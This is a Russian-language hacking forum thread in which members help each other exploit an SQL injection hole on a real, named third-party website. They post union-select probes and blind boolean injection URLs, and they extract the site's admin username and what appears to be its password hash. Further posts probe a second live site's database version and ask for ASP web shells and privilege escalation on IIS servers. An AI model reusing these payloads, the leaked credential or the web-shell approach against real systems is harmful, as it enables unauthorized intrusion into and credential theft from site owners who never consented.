HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.03.2009, 01:03
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами: 9081715

Репутация: 10
По умолчанию

вот, наткнулся на это
Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2
Unknown column 'Status' in 'field list'

А если делать запросы следующих видов:

Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2--
Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2,3
Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1
Выдает:The used SELECT statements have a different number of columns


Не первый раз такое встречается, кто-нить знает, как это раскрутить?
 
Ответить с цитированием

  #2  
Старый 23.03.2009, 01:12
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

ПаВлУшКа,

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+concat _ws(0x2F,username,password)+from+admin+limit+0,1), 3,1))>1
 
Ответить с цитированием

  #3  
Старый 23.03.2009, 01:26
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами: 9081715

Репутация: 10
По умолчанию

ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?
 
Ответить с цитированием

  #4  
Старый 23.03.2009, 01:31
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от ПаВлУшКа  
ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=4
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=5
4
А в его запросе-Просто пробелы убери.
 
Ответить с цитированием

  #5  
Старый 23.03.2009, 01:37
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию

Цитата:
Сообщение от ПаВлУшКа  
ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?
Вытягивай имя:

Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),5,1))%3E1
5 Символов, скорей всего admin

пасс:

Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+password+from+admin+limit+0,1),32,1))%3E1
32 симола - хэш
 
Ответить с цитированием

  #6  
Старый 23.03.2009, 02:24
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию

ПаВлУшКа
admin:3271d6889498c22a81b51aba93dc9307
 
Ответить с цитированием

  #7  
Старый 23.03.2009, 02:38
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами: 9081715

Репутация: 10
По умолчанию

ph1l1ster, а как ты хеш узнал? Я правильно понял:
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),5,1))%3E1

Проверяет, если usermane содержит 5 и меньше символов, то выводится страница, а если больше, то ошибка??
 
Ответить с цитированием

  #8  
Старый 23.03.2009, 02:45
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию

ПаВлУшКа
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),1,1))=97
первый символ ascii: 97 char: a

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),2,1))=100
второй символ ascii: 100 char:d

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),3,1))=109
третий символ ascii: 109 char: m

и тд.
 
Ответить с цитированием

  #9  
Старый 23.03.2009, 17:16
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Код:
http://top.warlib.ru/index.php?cid=1+and+substring(version(),1,1)=5
HIVER, пятая ветка.
 
Ответить с цитированием

  #10  
Старый 23.03.2009, 19:10
jangle
Познающий
Регистрация: 19.11.2006
Сообщений: 32
С нами: 10249722

Репутация: 5
По умолчанию

подскажите как действовать при имении веб шелла на win server, IIS, asp и php.
есть ли хорошие веб шелы на asp (многофукциональный). есть ли возможность повысить права через asp скрипты? заранее благодарен
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.